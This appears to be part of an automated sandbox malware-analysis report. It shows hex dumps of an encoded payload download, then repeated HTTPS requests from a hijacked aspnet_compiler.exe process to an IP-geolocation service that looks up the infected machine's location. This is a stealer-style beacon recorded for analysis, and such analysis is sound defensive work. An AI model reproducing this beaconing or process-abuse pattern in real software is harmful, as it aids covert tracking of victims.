                                                                2024-11-21 12:08:10 UTC1369INData Raw: 18 47 4f 30 39 34 1a 4c 37 32 3f 10 32 39 30 32 47 3d 30 39 34 49 65 32 32 3d 09 90 c6 cf cd 1f 10 32 39 30 32 01 a7 cd c6 cf 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 31 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 1d 39 30 32 3f 30 32 39 35 32 39 30 0a 13 30 32 39 1a 4c 46 32 32 3d 18 47 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 38 3b 30 36 03 fb
                                                                Data Ascii: GO094L72?2902G=094Ie22=2902 90%029"29$902+02-290!32=0290290290+02-290!32=0290290290+02-290!32=0290290290+02-290!32=0290290290*1942902902902#:0902802(;0412907020290502|3290902?0295290029LF22=G>040290L422=K8;06
                                                                2024-11-21 12:08:10 UTC1369INData Raw: 19 30 32 39 30 4c 34 32 32 3d 4b 18 3b 30 36 00 fc cd c6 cf 14 19 30 32 39 30 0a f8 cf cd c6 4e 4d 3b 30 36 11 45 35 39 36 12 39 30 32 39 4e 3f 3b 30 36 42 3a 30 39 34 08 9a cf cd c6 16 12 38 30 32 39 08 aa c6 cf cd 13 22 32 39 27 18 39 30 32 2b 30 32 2d 1a 32 39 30 31 09 38 32 3d 30 32 39 30 32 39 30 32 39 30 18 38 20 32 39 30 32 ee 31 9d bf 32 0b 2e 30 32 38 33 02 31 30 36 39 30 32 39 30 32 39 30 32 2d 1a 33 25 30 32 39 30 34 3b 78 7c 3b 09 25 39 30 33 3b 30 bf 39 bb 2a 38 4c 32 39 30 32 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 32 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 1c 39 30 32 3c 30 32 39 1f 32 39 30 0a 10 30 32 39 4e b2 3b 30 36 11 49 35 39 36 12 39 30 32 39 4e 3f
                                                                Data Ascii: 0290L422=K;060290NM;06E5969029N?;06B:0948029"29'902+02-290182=02902902908 290212.0283106902902902-3%02904;x|;%903;09*8L2902*1942902902902#:0902802(;0422907020290502|3290902<029290029N;06I5969029N?
                                                                2024-11-21 12:08:10 UTC1369INData Raw: d4 33 39 30 06 3b 30 32 00 30 32 39 27 32 39 31 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2a 00 31 39 b0 32 39 30 33 39 30 23 11 f8 30 39 36 12 3b 30 32 39 ce 3c 39 30 0a 39 30 32 39 ce 3e 39 30 77 3a 30 32 39 67 32 39 30 1c 39 30 32 3c 30 32 39 08 60 39 30 32 47 4f 30 39 34 1a 4c 37 32 3f 10 33 39 30 32 47 3d 30 39 34 49 72 32 32 3d 09 fe c6 cf cd 1f 10 33 39 30 32 01 f1 cd c6 cf 4c b9 32 32 3d 18 4b 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 4e 3b 30 36 03 93 cd c6 cf 14 19 30 32 39 30 0a a1 cf cd c6 1a 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 3a 00 3a 39 34 32 39 30 32 39 30 32 39 30 25 13 71 2e 39 30 32 39 30 32 b5 30 32 39 38 30 39 30 a6 3b 30 32 03 30 32 39 2b 32 39 31 21 09 33 32 b9 30 32 39 31 32 39 21 1a f1 32 32 3f 10 33 39 30 32 c7
                                                                Data Ascii: 390;02029'291!32=0290290290*19290390#096;029<909029>90w:029g290902<029`902GO094L72?3902G=094Ir22=3902L22=K>040290L422=KN;060290 90%029"29$902::94290290290%q.9029020298090;02029+291!32029129!22?3902
                                                                2024-11-21 12:08:10 UTC1369INData Raw: 32 39 30 33 39 30 23 11 f8 30 39 36 12 38 30 32 39 ce 3c 39 30 0a 39 30 32 39 ce 3e 39 30 77 3a 30 32 39 35 32 39 30 1d 39 30 32 17 30 32 39 08 32 39 30 32 47 b0 30 39 34 1a 40 37 32 3f 10 30 39 30 32 47 3d 30 39 34 49 27 32 32 3d 09 fe c6 cf cd 1f 10 33 39 30 32 01 f1 cd c6 cf 18 47 4f 30 39 34 1a 4c 37 32 3f 10 32 39 30 32 47 3d 30 39 34 49 53 32 32 3d 0a 90 c6 cf cd 1f 10 32 39 30 32 01 a7 cd c6 cf 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 2b 30 32 2f 1a 32 39 30 21 09 33 32 b9 30 32 39 31 32 39 21 1a f1 32 32 3f 10 33 39 30 32 c7 3e 32 39 08 32 39 30 32 c7 3c 32 39 75 31 39 30 32 16 30 32 39 36 32 39 30 37 39 30 32 01 1a 32 39 30 18 47 4f 30 39 34 1a 4c 37 32 3f 10 32 39 30 32 47 3d 30 39 34 49 04 32 32 3d 0a f9 c6 cf cd 1f 10 32 39 30 32 01 f0
                                                                Data Ascii: 290390#0968029<909029>90w:02952909020292902G094@72?0902G=094I'22=3902GO094L72?2902G=094IS22=2902 90%029"29$902+02/290!32029129!22?3902>292902<29u190202962907902290GO094L72?2902G=094I22=2902
                                                                2024-11-21 12:08:10 UTC1369INData Raw: 39 30 20 39 30 26 13 30 32 39 33 02 31 30 36 39 30 32 39 30 32 39 30 32 39 1a 73 25 30 32 39 30 32 39 61 32 39 30 4d 3b 30 32 e9 32 32 39 09 32 39 30 25 39 30 33 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 32 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 37 39 30 32 16 30 32 39 36 32 39 30 0a 39 30 32 39 1a 4c 46 32 32 3d 18 47 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 6c 3b 30 36 03 fb cd c6 cf 14 19 31 32 39 30 0a f9 cf cd c6 4e b2 3b 30 36 11 49 35 39 36 12 39 30 32 39 4e 3f 3b 30 36 42 35 30 39 34 08 9b cf cd c6 16 12 39 30 32 39 08 a5 c6 cf cd 1b 30 26 9c 14 32 39 31 18 39 30 32 2b 30 32 2e 1a 32 39 30 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 3a 00 3a 39 34 32 39 30 32
                                                                Data Ascii: 90 90&02931069029029029s%029029a290M;02229290%903*1942902902902#:0902802(;0422907020290502|3290790202962909029LF22=G>040290L422=Kl;061290N;06I5969029N?;06B509490290&291902+02.290 90%029"29$902::942902


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549811188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:00 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-11-21 12:09:00 UTC855INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:00 GMT
                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154849
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mf2aKseuBU5M%2Bxcx2t1UNcFu6ZxXoc%2BXyOQ%2FT4EnzZZ4ERs%2F780KT5eBuYbFy0A8z9QhZfBQhoaOR6Z0UeXRf5QC%2FStKQcIKtFAvEzQffNbpdCjaNBdIb8K7AsxKcLYZObS9NeTj"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6091818c6c435c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2207&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1379310&cwnd=248&unsent_bytes=0&cid=309229331e15737b&ts=464&x=0"
                                                                2024-11-21 12:09:00 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.549822188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:03 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-11-21 12:09:03 UTC854INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:03 GMT
                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154852
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDEFO5UlXfRv2BykU4Xf8XuOfTLn3gT3J7XQVWwUFV%2BW54nHDCfcFp7pD7AcHAo%2FsJ2COJsd41T%2F4ZrAibs7raCMs0wBvYPlh26cFYb21bSn%2BRZB3Dm2vHkfOmQy%2BauDMPntWIQz"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6091952ee342fe-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1817050&cwnd=32&unsent_bytes=0&cid=e5e77e3efc6f31b3&ts=452&x=0"
                                                                2024-11-21 12:09:03 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549829188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:06 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-11-21 12:09:06 UTC845INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:06 GMT
                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154855
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uu4xSz5nJlbsOheU0lZxPVB6lRmSoPm6LaiQ3nu4ezDxURMs0n2UjyffDc8bAWv6PB2SBazWFNx7IVuDHxQIojQwe0iK6dS5MKPjIX1GD6u6Tyibi8x0da4bCXMXDDITWMY0XD5s"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6091a8296641f9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1803582&cwnd=208&unsent_bytes=0&cid=70c4ed812e31bc2c&ts=460&x=0"
                                                                2024-11-21 12:09:06 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.549836188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:09 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-11-21 12:09:09 UTC849INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:09 GMT
                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154858
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0oLkiCE1NTlukDQOMcJJC2SI5xkg3sjBH87rObhDRxD3h8x6zOOpWO6PdVTV3UV8Qhdox%2B0VUMsls%2BcYpCSs9lbBHd0lrglQPzXpgNMvZVPZfHTvkQqDmHJm9DIeXuIiOL4JTNb"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6091badcdf4396-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1585&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1809169&cwnd=252&unsent_bytes=0&cid=81c381ddafc0b951&ts=477&x=0"
                                                                2024-11-21 12:09:09 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.549846188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:12 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-11-21 12:09:12 UTC848INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:12 GMT
                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154861
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2MDivRvhsArI3ryTNI6I3pXD9YFTodgNXgMvEflzJmF2L%2FA7SPc9ah3A%2F93jSZIb7Vdp8aLAGJkwpLn2wwYsJu4Hvm8eX5hV8EnOB9i09JXreZfc9mafhBUijN9Ssq3oWPGLCMgN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6091cd4a76efa7-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1993&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1392465&cwnd=32&unsent_bytes=0&cid=3ce54ad844a3078e&ts=464&x=0"
                                                                2024-11-21 12:09:12 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.549855188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:15 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-11-21 12:09:15 UTC847INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:15 GMT
                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154864
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1m0cvrc5Lm4jPCPKyzz3M4Y3gvK%2B3Y6ZlaZhBbrWZNabThmHhxPH6g2bGVHInkHnNNVipKR3jhp8NoS5fUAiEHo3lVbhh4sFW9tBCWTrLfGFIVz1UytsJBqWmLt3q4u4O65GfPz"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6091dfab415e86-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1546&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1772920&cwnd=238&unsent_bytes=0&cid=80348239ba836f0b&ts=454&x=0"
                                                                2024-11-21 12:09:15 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.549862188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:18 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-11-21 12:09:18 UTC855INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:18 GMT
                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154867
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CepEUcjjuj%2F6ppuzMoche6HCDWnIzQgbZHjKD1A5Os8ZXc1g2MbtsANu%2Fvt4WbvDJSr%2Be6nl3xS%2FMQ63m00r4YXAFBifAzvE%2FsyJ9SsZQ2qlyioIxhEl7p70hgnCqcVCATPYs98L"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6091f29dd78c57-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2123&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1548250&cwnd=208&unsent_bytes=0&cid=9677d569fd0eaf17&ts=480&x=0"
                                                                2024-11-21 12:09:18 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.549872188.114.97.34436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:09:21 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-11-21 12:09:21 UTC857INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:21 GMT
